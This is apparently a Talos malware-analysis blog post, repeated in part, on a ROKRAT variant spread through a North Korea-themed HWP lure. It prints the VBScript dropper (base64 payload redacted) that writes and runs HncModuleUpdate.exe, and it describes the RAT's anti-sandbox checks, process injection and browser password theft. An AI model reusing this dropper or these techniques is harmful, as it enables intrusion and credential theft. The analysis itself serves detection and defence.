Executive ...">Warren Mercer, Paul Rascagneres and with contributions from Jungsoo An.
Executive ...">Warren Mercer, Paul Rascagneres and with contributions from Jungsoo An.
Executive ...">
HistoryNov 27, 2017 - 9:52 p.m.
ROKRAT Reloaded
<div></div><div>This post was authored by <a href=βhttps://www.twitter.com/SecurityBeard/β>Warren Mercer</a>, <a href=βhttps://www.twitter.com/r00tbsdβ>Paul Rascagneres</a> and with contributions from Jungsoo An.</div><div><br /></div><h2>Executive Summary</h2><br />Earlier this year, Talos published 2 articles concerning South Korean threats. The <a href=βhttp://blog.talosintelligence.com/2017/02/korean-maldoc.htmlβ>first one</a> was about the use of a malicious HWP document which dropped downloaders used to retrieve malicious payloads on several compromised websites. One of the website was a compromised government website. We named this case βEvil New Yearsβ. The <a href=βhttp://blog.talosintelligence.com/2017/04/introducing-rokrat.htmlβ>second one</a> was about the analysis and discovery of the ROKRAT malware.<br /><br />This month, Talos discovered a new ROKRAT version. This version contains technical elements that link the two previous articles. This new sample contains code from the two publications earlier this year:<br /><br /><ul><li>It contains the same reconnaissance code used;</li><li>Similar PDB pattern that the βEvil New Yearsβ samples used;</li><li>it contains the same cloud features and similar copy-paste methods that ROKRAT used;</li><li>It uses cloud platform as C&C but not exactly the same. This version uses pcloud, box, dropbox and yandex.</li></ul><br /><a></a><br /><br />We also discovered that this new version of ROKRAT shares code with Freenki, a downloader used in the FreeMilk campaign. <br /><br />The campaign started, unsurprisingly, with a malicious HWP document. This document was alleged to be written by a lawyer who claims to represent the βCitizensβ Alliance for North Korean Human Rights and Reunification of Korean Peninsulaβ. It mentions a meeting of this group that took place the 1st of November at Seoul. Due to the content of this malicious document we can assume that the targets are interested by the situation in North Korea. This malicious document drops and executes a new version of ROKRAT.<br /><br /><h2>HWP Malicious Document</h2><br />As with the previous ROKRAT campaigns we described the infection vector used with this actor is a malicious HWP document. The HWP files are created using Hangul Word Processor, a popular alternative to Microsoft Office for South Korean users developed by Hancom. Here is a screenshot of the malicious document:<br /><div><a href=βhttps://2.bp.blogspot.com/-oZY_XkhLCak/WhyBjcvv1DI/AAAAAAAAAMY/EtxUBxnlW0I7Zw5dvU4cVLCmMy3vVYzEwCLcBGAs/s1600/image7.pngβ><img height=β640β src=βhttps://2.bp.blogspot.com/-oZY_XkhLCak/WhyBjcvv1DI/AAAAAAAAAMY/EtxUBxnlW0I7Zw5dvU4cVLCmMy3vVYzEwCLcBGAs/s640/image7.pngβ width=β426β /></a></div><br />The malicious document mentions the βCommunity of North Korean human right and unificationβ. We first observed his campaign during November 2017. The document was alleged to be written by a lawyer who has been representing the community known as βμ¬μΈν΅ (μ¬λ°λ₯ΈλΆνμΈκΆλ²κ³Όν΅μΌμμνμλ―Όλͺ¨μ)β.<br /><br />The purpose of the document is to arrange a meeting to discuss about items which are related to βNorth Korean Human Rights Actβ and βEnactment of a lawβ which passed in last 2016 in South Korea.<br /><br />Based on the meeting date (1st Nov 2017), this decoy document could be delivered to the stakeholders in the community βμ¬μΈν΅β by pretending to be a request to join the discussion for finding better ideas/ways to let more people be interested in their activity before Nov 2017.<br /><br />The HWP file contains an OLE object named BIN0001.OLE. Once extracted and uncompressed (zlib), we obtain the following script:<br /><pre>const strEncode = βTVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA6AAAAA4fug4AtAnNIbgBTM0hV[β¦redactedβ¦]AAAAAAAAAAAAAAAAAAAAAA=β<br />DIM outFile<br />DIM base64Decoded<br />DIM shell_obj<br />SET shell_obj = CreateObject(βWScript.Shellβ)<br />DIM fso<br />SET fso = CreateObject(βScripting.FileSystemObjectβ)<br />outFile = βc:\ProgramData\HncModuleUpdate.exeβ<br />base64Decoded = decodeBase64(strEncode)<br />IF NOT(fso.FileExists(outFile)) then<br />writeBytes outFile, base64Decoded<br />shell_obj.run outFile<br />END IF<br />WScript.Quit()<br />private function decodeBase64(base64)<br />DIM DM, EL<br />SET DM = CreateObject(βMicrosoft.XMLDOMβ)<br />SET EL = DM.createElement(βtmpβ)<br />EL.DataType = βbin.base64β<br />EL.Text = base64<br />decodeBase64 = EL.NodeTypedValue<br />end function<br />private Sub writeBytes(file, bytes)<br />DIM binaryStream<br />SET binaryStream = CreateObject(βADODB.Streamβ)<br />binaryStream.Type = 1<br />binaryStream.Open<br />binaryStream.Write bytes<br />binaryStream.SaveToFile file, 1<br />End Sub<br /></pre>The purpose is to decode, using the base64 algorithm, the content of the strEncode variable. The decoded data is stored in the c:\ProgramData\HncModuleUpdate.exe file and executed. The binary is the ROKRAT dropper. The specific filename βHncModuleUpdateβ may fool a user into thinking this is a Hancom software.<br /><br /><h2>Stage 1: Dropper</h2><br />The purpose of the dropper is to extract the resource named SBS. This resource contains malicious shellcode. Additionally, the dropper executes a new cmd.exe process, injects the extracted resource and executes it. The code injection is performed by the VirtualAlloc(), WriteProcessMemory() and CreateRemoteThread() APIs:<br /><div><a href=βhttps://4.bp.blogspot.com/-UK3O08XFp2k/WhyBximnWLI/AAAAAAAAAMc/s5N3fKQB__ks4xpcTOH6GtWfOMVzQS_TwCLcBGAs/s1600/image6.pngβ><img height=β640β src=βhttps://4.bp.blogspot.com/-UK3O08XFp2k/WhyBximnWLI/AAAAAAAAAMc/s5N3fKQB__ks4xpcTOH6GtWfOMVzQS_TwCLcBGAs/s640/image6.pngβ width=β508β /></a></div><br />Once executed, the shellcode will decoded a PE file, will load it in the memory of cmd.exe and finally will execute it. This payload is a new variant of ROKRAT.<br /><br />Additionally, one of the analysed droppers displays a picture to the user:<br /><div><a href=βhttps://2.bp.blogspot.com/-UdRh6pJR0FU/WhyB6um-i6I/AAAAAAAAAMg/Rujz_rpXM8AIMWxHayfmA7v0sdKxbxYawCLcBGAs/s1600/image20.pngβ><img height=β353β src=βhttps://2.bp.blogspot.com/-UdRh6pJR0FU/WhyB6um-i6I/AAAAAAAAAMg/Rujz_rpXM8AIMWxHayfmA7v0sdKxbxYawCLcBGAs/s400/image20.pngβ width=β400β /></a></div><br />The people in the pictures are about the Korean war and people related to independence troops during the βindependence movementβ. The image on the top left comes from <a href=βhttps://ko.wikipedia.org/wiki/λ°±μ μ½β>Wikipedia</a>. The picture in the middle left comes from <a href=βhttp://m.blog.daum.net/_blog/_m/articleView.do?blogid=0UCYA&articleno=1545β>this blog</a>. And the bottom left image comes from this <a href=βhttp://m.ohmynews.com/NWS_Web/Mobile/at_pg.aspx?CNTN_CD=A0000939170#cbβ>news website</a>. The decoy image seems to be a set of public pictures.<br /><br /><h2>Stage 2: ROKRAT</h2><h3>Similarities With the βEvil New Yearsβ MalDoc</h3><br />This variant of ROKRAT contains similar code with the βEvil New Yearsβ downloader. The information collected during the reconnaissance phase is similar. The malware uses the following registry key to get the machine type: HKLM\System\CurrentControlSet\Services\mssmbios\Data\SMBiosData. The βSystem manufacturerβ value is used to identify the type of machine. Here is the graph flow of the βEvil New Yearsβ downloader:<br /><div><a href=βhttps://4.bp.blogspot.com/-ThSGoJ2fiL8/WhyCFM6M3SI/AAAAAAAAAMo/kS5m9vVHIhUAhkMPEhb-YiPH5-WISQ0hgCLcBGAs/s1600/image10.pngβ><img height=β452β src=βhttps://4.bp.blogspot.com/-ThSGoJ2fiL8/WhyCFM6M3SI/AAAAAAAAAMo/kS5m9vVHIhUAhkMPEhb-YiPH5-WISQ0hgCLcBGAs/s640/image10.pngβ width=β640β /></a></div><br />The graph flow of the ROKRAT variant:<br /><div><a href=βhttps://2.bp.blogspot.com/-sshO1piH2Z4/WhyCKaO_YUI/AAAAAAAAAMs/T-ioks5MAWQP9yqvUiBKHLO88h3IIGBQgCLcBGAs/s1600/image13.pngβ><img height=β450β src=βhttps://2.bp.blogspot.com/-sshO1piH2Z4/WhyCKaO_YUI/AAAAAAAAAMs/T-ioks5MAWQP9yqvUiBKHLO88h3IIGBQgCLcBGAs/s640/image13.pngβ width=β640β /></a></div><br />The graph flows are 99% similar. Additionally, the machine type is described with the following strings:<br /><div><a href=βhttps://4.bp.blogspot.com/-P3vttCd3--8/WhyCQUU2stI/AAAAAAAAAMw/yqLRBtpi1DUNwbOJ8WiPWn9nC3rtishggCLcBGAs/s1600/image8.pngβ><img height=β254β src=βhttps://4.bp.blogspot.com/-P3vttCd3--8/WhyCQUU2stI/AAAAAAAAAMw/yqLRBtpi1DUNwbOJ8WiPWn9nC3rtishggCLcBGAs/s640/image8.pngβ width=β640β /></a></div><br />The code appears to be based on this <a href=βhttp://www.rohitab.com/discuss/topic/35915-win32-api-to-get-system-information/?p%3D10075283β>forum</a> post describing the use of the Win32 APIs used. The source code only considers the following type:<br /><pre>default: lpString = β(Other)β; break;<br />case 0x02: lpString = β(Unknown)β; break;<br />case 0x03: lpString = β(Desktop)β; break;<br />case 0x04: lpString = β(Low Profile Desktop)β; break;<br />case 0x06: lpString = β(Mini Tower)β; break;<br />case 0x07: lpString = β(Tower)β; break;<br />case 0x08: lpString = β(Portable)β; break;<br />case 0x09: lpString = β(Laptop)β; break;<br />case 0x0A: lpString = β(Notebook)β; break;<br />case 0x0E: lpString = β(Sub Notebook)β; break;<br /></pre>Notice the () used by the ROKRAT author too. Some values are ignored as we can see from the <a href=βhttp://www.dmtf.org/sites/default/files/standards/documents/DSP0134_2.7.0.pdfβ>SMBIOS documentation</a>:<br /><div><a href=βhttps://2.bp.blogspot.com/-0Ere0jsIaBM/WhyCWDThHsI/AAAAAAAAAM0/hGb9Yd4MiZ85bo8q1mlGuZ8VzRrFI690wCLcBGAs/s1600/image19.pngβ><img height=β640β src=βhttps://2.bp.blogspot.com/-0Ere0jsIaBM/WhyCWDThHsI/AAAAAAAAAM0/hGb9Yd4MiZ85bo8q1mlGuZ8VzRrFI690wCLcBGAs/s640/image19.pngβ width=β478β /></a></div><br />The missing values are also omitted from the forum post.<br /><br />Another similarity is the PDB path. The βEvil New Yearβ sample contained the following PDB path: <br /><ul><li><pre>e:\Happy\Work\Source\version 12\T+M\Result\DocPrint.pdb</pre></li></ul>This new ROKRAT variant contains the following PDB:<br /><ul><li><pre>d:\HighSchool\version 13\2ndBD\T+M\T+M\Result\DocPrint.pdb</pre></li></ul>We clearly have the similar pattern.<br /><h3>Anti-Sandbox</h3><br />This ROKRAT variant contain anti-sandbox tricks. This is performed by checking if the following libraries are loaded:<br /><br /><ul><li>SbieDll.dll (sandboxie library)</li><li>Dbghelp.dll (Microsoft debugging tools)</li><li>Api_log.dll (threatAnalyzer / GFI SandBox)</li><li>Dir_watch.dll (threatAnalyzer / GFI SandBox)</li></ul><div><a href=βhttps://3.bp.blogspot.com/-tMpcUMOjVY4/WhyCeLjiTtI/AAAAAAAAAM4/55qQDK6rByglGRQeSmTpw6kLM3ksCkJ9QCLcBGAs/s1600/image4.pngβ><img height=β374β src=βhttps://3.bp.blogspot.com/-tMpcUMOjVY4/WhyCeLjiTtI/AAAAAAAAAM4/55qQDK6rByglGRQeSmTpw6kLM3ksCkJ9QCLcBGAs/s640/image4.pngβ width=β640β /></a></div><h3>Anti-Debug</h3><br />This ROKRAT version contains anti-debug tricks. For example it uses the following NOP technique:<br /><div><a href=βhttps://2.bp.blogspot.com/--2thdwNFFWk/WhyCxluop1I/AAAAAAAAANA/ZvScFYWEfmEX8V0XKU8Ab3e6RR9Nl3vFACLcBGAs/s1600/image5.pngβ><img height=β438β src=βhttps://2.bp.blogspot.com/--2thdwNFFWk/WhyCxluop1I/AAAAAAAAANA/ZvScFYWEfmEX8V0XKU8Ab3e6RR9Nl3vFACLcBGAs/s640/image5.pngβ width=β640β /></a></div><br />nop dword ptr [eax+eax+00h] is a 5 bytes NOP: 0x0F1F440000. But this opcode is not correctly supported by Immunity Debugger, the assembly is replaced by β???β in red in the screenshot:<br /><div><a href=βhttps://1.bp.blogspot.com/-FOQkjTQlNvA/WhyC3zsnVTI/AAAAAAAAANE/WmpI7gwqSBM75SG_ls-3cHjVzcKC50JTgCLcBGAs/s1600/image2.pngβ><img height=β322β src=βhttps://1.bp.blogspot.com/-FOQkjTQlNvA/WhyC3zsnVTI/AAAAAAAAANE/WmpI7gwqSBM75SG_ls-3cHjVzcKC50JTgCLcBGAs/s640/image2.pngβ width=β640β /></a></div><h3>Screenshots Feature</h3><br />The two ROKRAT versions performed screenshots. Itβs interesting to note similarities between the two versions. Especially the filename of the saved screenshot, here is the April ROKRAT version:<br /><div><a href=βhttps://2.bp.blogspot.com/-9U3juJSttOw/WhyC_xXCS7I/AAAAAAAAANI/QFDm3a7rfxQcmAM_ly8YHcSBuD4WW6FegCLcBGAs/s1600/image17.pngβ><img height=β640β src=βhttps://2.bp.blogspot.com/-9U3juJSttOw/WhyC_xXCS7I/AAAAAAAAANI/QFDm3a7rfxQcmAM_ly8YHcSBuD4WW6FegCLcBGAs/s640/image17.pngβ width=β488β /></a></div><br />And the code of the November version:<br /><div><a href=βhttps://1.bp.blogspot.com/--n6yXqONkEs/WhyDFe5MlnI/AAAAAAAAANM/3XsNWR3OdBUI3VK6FQLIhAGsopYx4WT5ACLcBGAs/s1600/image11.pngβ><img height=β586β src=βhttps://1.bp.blogspot.com/--n6yXqONkEs/WhyDFe5MlnI/AAAAAAAAANM/3XsNWR3OdBUI3VK6FQLIhAGsopYx4WT5ACLcBGAs/s640/image11.pngβ width=β640β /></a></div><br />The pattern is exactly the same: %s%04X%04X.tmp. The two %04X are random values. And the %s contains a temporary path (obtained with GetTempPath()). In both sample, the string length is 0x12C (300). This part is clearly a copy-paste.<br /><h3>Browser Password Stealer</h3><br />One of the analysed November ROKRAT samples contained a browser stealing capability. The malware is able to extract the stored passwords from Internet Explorer, Chrome and Firefox. For Chrome and Firefox, the malware queries the sqlite database containing the URL, username and password:<br /><div><a href=βhttps://2.bp.blogspot.com/-1c4E_cI5198/WhyDL5Xq05I/AAAAAAAAANQ/pkyAlBQDvAgq3n9AX1XpGuRd8uLEQhbVACLcBGAs/s1600/image3.pngβ><img height=β276β src=βhttps://2.bp.blogspot.com/-1c4E_cI5198/WhyDL5Xq05I/AAAAAAAAANQ/pkyAlBQDvAgq3n9AX1XpGuRd8uLEQhbVACLcBGAs/s640/image3.pngβ width=β640β /></a></div><br />Additionally, ROKRAT supports the Microsoft Vault mechanism. Vault was implemented in Windows 7, it contains any sensitive data (like the credentials) of Internet Explorer. Here is the initialization of the Vault APIs:<br /><div><a href=βhttps://2.bp.blogspot.com/-kgM45XXgNKw/WhyDSVHJD5I/AAAAAAAAANY/y18ZaMeY3XAiJJt0c2qUT88YUc-HQfPtACLcBGAs/s1600/image14.pngβ><img height=β640β src=βhttps://2.bp.blogspot.com/-kgM45XXgNKw/WhyDSVHJD5I/AAAAAAAAANY/y18ZaMeY3XAiJJt0c2qUT88YUc-HQfPtACLcBGAs/s640/image14.pngβ width=β390β /></a></div><br />The ROKRAT implementation is largely based on the <a href=βhttps://www.codeproject.com/Articles/1167943/The-Secrets-of-Internet-Explorer-Credentialsβ>following project</a>. This is a change of tactic for ROKRAT when compared with previous samples/versions. This time the actor is specifically targeting information which would be used for additional compromises and maybe even on potential personal accounts. The method used by the ROKRAT actors was also out of the ordinary as they embedded the whole SQLite library into their executable to allow the SQLite browsing attempts used for Firefox & Google Chrome.<br /><br />During our investigation, we discovered that the browser password stealer code is exactly the same as the code used during the <a href=βhttps://researchcenter.paloaltonetworks.com/2017/10/unit42-freemilk-highly-targeted-spear-phishing-campaign/β>FreeMilk</a> campaign described by Unit 42. In this article, the author already noticed C2 infrastructure overlap between FreeMilk and ROKRAT. In addition, we can add that some code overlap is present between the 2 samples:<br /><div><a href=βhttps://1.bp.blogspot.com/-wgeOLIL7OBQ/WhyDX-7egxI/AAAAAAAAANc/bj86udF7beAhD0Q3kWPDDLsJPNjWn-FBwCLcBGAs/s1600/image12.pngβ><img height=β408β src=βhttps://1.bp.blogspot.com/-wgeOLIL7OBQ/WhyDX-7egxI/AAAAAAAAANc/bj86udF7beAhD0Q3kWPDDLsJPNjWn-FBwCLcBGAs/s640/image12.pngβ width=β640β /></a></div><br />On the left, we have the ROKRAT sample and on the right the FreeMilk sample. We can notice that in addition to the code, the author copy-pasted English typos such as βIE Registeryβ.<br /><h3>Cloud Platforms Used As C&C</h3><br />Finally, this ROKRAT version uses cloud platforms in exactly the same way as our previous analysis. This time, the author did not use social network platforms, but different cloud providers:<br /><br /><ul><li><div></div><h4>pcloud</h4></li></ul><ul></ul><div><a href=βhttps://3.bp.blogspot.com/-PrgljjxiAFo/WhyEcoSdFdI/AAAAAAAAAN4/bdK6iwGJ8moRLm9NDzv_5CVZx82QlV0NQCLcBGAs/s1600/image18.pngβ><img height=β640β src=βhttps://3.bp.blogspot.com/-PrgljjxiAFo/WhyEcoSdFdI/AAAAAAAAAN4/bdK6iwGJ8moRLm9NDzv_5CVZx82QlV0NQCLcBGAs/s640/image18.pngβ width=β550β /></a></div><br /><br /><ul><li><h4>Box</h4></li></ul><div><a href=βhttps://1.bp.blogspot.com/-mEPlwuN1nzk/WhyEywpiFYI/AAAAAAAAAOA/WJFSGK8Ylp8IQE6Vru-WMQWd57IGHsBkwCLcBGAs/s1600/image15.pngβ><img height=β294β src=βhttps://1.bp.blogspot.com/-mEPlwuN1nzk/WhyEywpiFYI/AAAAAAAAAOA/WJFSGK8Ylp8IQE6Vru-WMQWd57IGHsBkwCLcBGAs/s640/image15.pngβ width=β640β /></a></div><div><br /></div><ul><li><h4>Dropbox</h4></li></ul><div><a href=βhttps://3.bp.blogspot.com/-DFU-dyBrdNg/WhyFAJdvf6I/AAAAAAAAAOM/oP6_ri4qfBQZa3-1tuSvysODAQyRZT73gCLcBGAs/s1600/image9.pngβ><img height=β458β src=βhttps://3.bp.blogspot.com/-DFU-dyBrdNg/WhyFAJdvf6I/AAAAAAAAAOM/oP6_ri4qfBQZa3-1tuSvysODAQyRZT73gCLcBGAs/s640/image9.pngβ width=β640β /></a></div><ul><li><h4>Yandex</h4></li></ul><div><a href=βhttps://4.bp.blogspot.com/-obpjJED7PA8/WhyFL04Jk0I/AAAAAAAAAOQ/5c1siYoQcdAt8UgR9YIuTXiawtZlN1DhACLcBGAs/s1600/image16.pngβ><img height=β276β src=βhttps://4.bp.blogspot.com/-obpjJED7PA8/WhyFL04Jk0I/AAAAAAAAAOQ/5c1siYoQcdAt8UgR9YIuTXiawtZlN1DhACLcBGAs/s640/image16.pngβ width=β640β /></a></div><div><br /></div><h2>Conclusion</h2><br />This campaign shows that the actor behind ROKRAT is still active. Based on the PDB, it could be the 13th version of this malware. This actor made the decision only to use legitimate cloud platforms, but changed some from the last incarnation. From an attackerβs perspective itβs an interesting choice, the flow is encrypted by default with HTTPS and the malicious flow can be difficult to find in the middle of legitimate traffic to these platforms. We can also determine that the actor likes to use code already available on the internet in various repositories we mentioned throughout this post ie; GitHub, Code Project and other public forums.<br /><br />Based on source code copy-paste, we remain highly confident that the author of ROKRAT is also behind, or working with those behind, the FreeMilk spear phishing campaign. This is further proven by the fact that ROKRAT shares code with Freenki downloader used in the FreeMilk campaign.<br /><br />Moreover, the actor is always interested by the same pattern of targets, the decoy documents refer to precise elements related to the geopolitical situation between North and South Korea. Generally, the documents reference the Ministry of Unification or the situation of North Korean citizens. They frequently contain specific references to real meetings or conferences, showing a high knowledge of current events in North and South Korea.<br /><br />Together this information helps us to understand the profile of the targeted systems and the interests of the threat actor.<br /><br /><h2>Coverage</h2><br />Additional ways our customers can detect and block this threat are listed below.<br /><div><a href=βhttps://3.bp.blogspot.com/-h3Ubgz2tpKo/WhyDpf-abzI/AAAAAAAAANk/QXJs9157NFcro7ZHWf36KsfFiQ2yjgazgCLcBGAs/s1600/image1.pngβ><img src=βhttps://3.bp.blogspot.com/-h3Ubgz2tpKo/WhyDpf-abzI/AAAAAAAAANk/QXJs9157NFcro7ZHWf36KsfFiQ2yjgazgCLcBGAs/s1600/image1.pngβ /></a></div>Advanced Malware Protection (<a href=βhttps://www.cisco.com/c/en/us/products/security/advanced-malware-protectionβ>AMP</a>) is ideally suited to prevent the execution of the malware used by these threat actors.<br /><br /><a href=βhttps://www.cisco.com/c/en/us/products/security/cloud-web-security/index.htmlβ>CWS</a> or<a href=βhttps://www.cisco.com/c/en/us/products/security/web-security-appliance/index.htmlβ> WSA</a> web scanning prevents access to malicious websites and detects malware used in these attacks.<br /><br /><a href=βhttps://www.cisco.com/c/en/us/products/security/email-security-appliance/index.htmlβ>Email Security</a> can block malicious emails sent by threat actors as part of their campaign.<br /><br />Network Security appliances such as<a href=βhttps://www.cisco.com/c/en/us/products/security/firewalls/index.htmlβ> </a><a href=βhttps://www.cisco.com/c/en/us/products/security/firewalls/index.htmlβ>NGFW</a>,<a href=βhttps://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.htmlβ> </a><a href=βhttps://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.htmlβ>NGIPS</a>, and<a href=βhttps://meraki.cisco.com/products/appliancesβ> </a><a href=βhttps://meraki.cisco.com/products/appliancesβ>Meraki MX</a> can detect malicious activity associated with this threat.<br /><br /><a href=βhttps://www.cisco.com/c/en/us/solutions/enterprise-networks/amp-threat-grid/index.htmlβ>AMP Threat Grid</a> helps identify malicious binaries and build protection into all Cisco Security products.<br /><br /><a href=βhttps://umbrella.cisco.com/β>Umbrella</a>, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.<br /><br />Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on <a href=βhttps://www.snort.org/productsβ>Snort.org</a>.<br /><br /><h2>IOCs</h2><br />Path: c:\ProgramData\HncModuleUpdate.exe<br />MalDoc: 171e26822421f7ed2e34cc092eaeba8a504b5d576c7fd54aa6975c2e2db0f824<br />Dropper #1: a29b07a6fe5d7ce3147dd7ef1d7d18df16e347f37282c43139d53cce25ae7037<br />Dropper #2: eb6d25e08b2b32a736b57f8df22db6d03dc82f16da554f4e8bb67120eacb1d14<br />Dropper #3: 9b383ebc1c592d5556fec9d513223d4f99a5061591671db560faf742dd68493f<br />ROKRAT: b3de3f9309b2f320738772353eb724a0782a1fc2c912483c036c303389307e2e<br />Freenki: 99c1b4887d96cb94f32b280c1039b3a7e39ad996859ffa6dd011cf3cca4f1ba5<div>
<a href=βhttp://feeds.feedburner.com/~ff/feedburner/Talos?a=fAmkhLaUPK8:-FWTXT_BreY:yIl2AUoC8zAβ><img src=βhttp://feeds.feedburner.com/~ff/feedburner/Talos?d=yIl2AUoC8zAβ></img></a>
</div><img src=βhttp://feeds.feedburner.com/~r/feedburner/Talos/~4/fAmkhLaUPK8β height=β1β width=β1β alt />
Executive ...">
HistoryNov 27, 2017 - 9:52 p.m.
ROKRAT Reloaded
<div></div><div>This post was authored by <a href=βhttps://www.twitter.com/SecurityBeard/β>Warren Mercer</a>, <a href=βhttps://www.twitter.com/r00tbsdβ>Paul Rascagneres</a> and with contributions from Jungsoo An.</div><div><br /></div><h2>Executive Summary</h2><br />Earlier this year, Talos published 2 articles concerning South Korean threats. The <a href=βhttp://blog.talosintelligence.com/2017/02/korean-maldoc.htmlβ>first one</a> was about the use of a malicious HWP document which dropped downloaders used to retrieve malicious payloads on several compromised websites. One of the website was a compromised government website. We named this case βEvil New Yearsβ. The <a href=βhttp://blog.talosintelligence.com/2017/04/introducing-rokrat.htmlβ>second one</a> was about the analysis and discovery of the ROKRAT malware.<br /><br />This month, Talos discovered a new ROKRAT version. This version contains technical elements that link the two previous articles. This new sample contains code from the two publications earlier this year:<br /><br /><ul><li>It contains the same reconnaissance code used;</li><li>Similar PDB pattern that the βEvil New Yearsβ samples used;</li><li>it contains the same cloud features and similar copy-paste methods that ROKRAT used;</li><li>It uses cloud platform as C&C but not exactly the same. This version uses pcloud, box, dropbox and yandex.</li></ul><br /><a></a><br /><br />We also discovered that this new version of ROKRAT shares code with Freenki, a downloader used in the FreeMilk campaign. <br /><br />The campaign started, unsurprisingly, with a malicious HWP document. This document was alleged to be written by a lawyer who claims to represent the βCitizensβ Alliance for North Korean Human Rights and Reunification of Korean Peninsulaβ. It mentions a meeting of this group that took place the 1st of November at Seoul. Due to the content of this malicious document we can assume that the targets are interested by the situation in North Korea. This malicious document drops and executes a new version of ROKRAT.<br /><br /><h2>HWP Malicious Document</h2><br />As with the previous ROKRAT campaigns we described the infection vector used with this actor is a malicious HWP document. The HWP files are created using Hangul Word Processor, a popular alternative to Microsoft Office for South Korean users developed by Hancom. Here is a screenshot of the malicious document:<br /><div><a href=βhttps://2.bp.blogspot.com/-oZY_XkhLCak/WhyBjcvv1DI/AAAAAAAAAMY/EtxUBxnlW0I7Zw5dvU4cVLCmMy3vVYzEwCLcBGAs/s1600/image7.pngβ><img height=β640β src=βhttps://2.bp.blogspot.com/-oZY_XkhLCak/WhyBjcvv1DI/AAAAAAAAAMY/EtxUBxnlW0I7Zw5dvU4cVLCmMy3vVYzEwCLcBGAs/s640/image7.pngβ width=β426β /></a></div><br />The malicious document mentions the βCommunity of North Korean human right and unificationβ. We first observed his campaign during November 2017. The document was alleged to be written by a lawyer who has been representing the community known as βμ¬μΈν΅ (μ¬λ°λ₯ΈλΆνμΈκΆλ²κ³Όν΅μΌμμνμλ―Όλͺ¨μ)β.<br /><br />The purpose of the document is to arrange a meeting to discuss about items which are related to βNorth Korean Human Rights Actβ and βEnactment of a lawβ which passed in last 2016 in South Korea.<br /><br />Based on the meeting date (1st Nov 2017), this decoy document could be delivered to the stakeholders in the community βμ¬μΈν΅β by pretending to be a request to join the discussion for finding better ideas/ways to let more people be interested in their activity before Nov 2017.<br /><br />The HWP file contains an OLE object named BIN0001.OLE. Once extracted and uncompressed (zlib), we obtain the following script:<br /><pre>const strEncode = βTVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA6AAAAA4fug4AtAnNIbgBTM0hV[β¦redactedβ¦]AAAAAAAAAAAAAAAAAAAAAA=β<br />DIM outFile<br />DIM base64Decoded<br />DIM shell_obj<br />SET shell_obj = CreateObject(βWScript.Shellβ)<br />DIM fso<br />SET fso = CreateObject(βScripting.FileSystemObjectβ)<br />outFile = βc:\ProgramData\HncModuleUpdate.exeβ<br />base64Decoded = decodeBase64(strEncode)<br />IF NOT(fso.FileExists(outFile)) then<br />writeBytes outFile, base64Decoded<br />shell_obj.run outFile<br />END IF<br />WScript.Quit()<br />private function decodeBase64(base64)<br />DIM DM, EL<br />SET DM = CreateObject(βMicrosoft.XMLDOMβ)<br />SET EL = DM.createElement(βtmpβ)<br />EL.DataType = βbin.base64β<br />EL.Text = base64<br />decodeBase64 = EL.NodeTypedValue<br />end function<br />private Sub writeBytes(file, bytes)<br />DIM binaryStream<br />SET binaryStream = CreateObject(βADODB.Streamβ)<br />binaryStream.Type = 1<br />binaryStream.Open<br />binaryStream.Write bytes<br />binaryStream.SaveToFile file, 1<br />End Sub<br /></pre>The purpose is to decode, using the base64 algorithm, the content of the strEncode variable. The decoded data is stored in the c:\ProgramData\HncModuleUpdate.exe file and executed. The binary is the ROKRAT dropper. The specific filename βHncModuleUpdateβ may fool a user into thinking this is a Hancom software.<br /><br /><h2>Stage 1: Dropper</h2><br />The purpose of the dropper is to extract the resource named SBS. This resource contains malicious shellcode. Additionally, the dropper executes a new cmd.exe process, injects the extracted resource and executes it. The code injection is performed by the VirtualAlloc(), WriteProcessMemory() and CreateRemoteThread() APIs:<br /><div><a href=βhttps://4.bp.blogspot.com/-UK3O08XFp2k/WhyBximnWLI/AAAAAAAAAMc/s5N3fKQB__ks4xpcTOH6GtWfOMVzQS_TwCLcBGAs/s1600/image6.pngβ><img height=β640β src=βhttps://4.bp.blogspot.com/-UK3O08XFp2k/WhyBximnWLI/AAAAAAAAAMc/s5N3fKQB__ks4xpcTOH6GtWfOMVzQS_TwCLcBGAs/s640/image6.pngβ width=β508β /></a></div><br />Once executed, the shellcode will decoded a PE file, will load it in the memory of cmd.exe and finally will execute it. This payload is a new variant of ROKRAT.<br /><br />Additionally, one of the analysed droppers displays a picture to the user:<br /><div><a href=βhttps://2.bp.blogspot.com/-UdRh6pJR0FU/WhyB6um-i6I/AAAAAAAAAMg/Rujz_rpXM8AIMWxHayfmA7v0sdKxbxYawCLcBGAs/s1600/image20.pngβ><img height=β353β src=βhttps://2.bp.blogspot.com/-UdRh6pJR0FU/WhyB6um-i6I/AAAAAAAAAMg/Rujz_rpXM8AIMWxHayfmA7v0sdKxbxYawCLcBGAs/s400/image20.pngβ width=β400β /></a></div><br />The people in the pictures are about the Korean war and people related to independence troops during the βindependence movementβ. The image on the top left comes from <a href=βhttps://ko.wikipedia.org/wiki/λ°±μ μ½β>Wikipedia</a>. The picture in the middle left comes from <a href=βhttp://m.blog.daum.net/_blog/_m/articleView.do?blogid=0UCYA&articleno=1545β>this blog</a>. And the bottom left image comes from this <a href=βhttp://m.ohmynews.com/NWS_Web/Mobile/at_pg.aspx?CNTN_CD=A0000939170#cbβ>news website</a>. The decoy image seems to be a set of public pictures.<br /><br /><h2>Stage 2: ROKRAT</h2><h3>Similarities With the βEvil New Yearsβ MalDoc</h3><br />This variant of ROKRAT contains similar code with the βEvil New Yearsβ downloader. The information collected during the reconnaissance phase is similar. The malware uses the following registry key to get the machine type: HKLM\System\CurrentControlSet\Services\mssmbios\Data\SMBiosData. The βSystem manufacturerβ value is used to identify the type of machine. Here is the graph flow of the βEvil New Yearsβ downloader:<br /><div><a href=βhttps://4.bp.blogspot.com/-ThSGoJ2fiL8/WhyCFM6M3SI/AAAAAAAAAMo/kS5m9vVHIhUAhkMPEhb-YiPH5-WISQ0hgCLcBGAs/s1600/image10.pngβ><img height=β452β 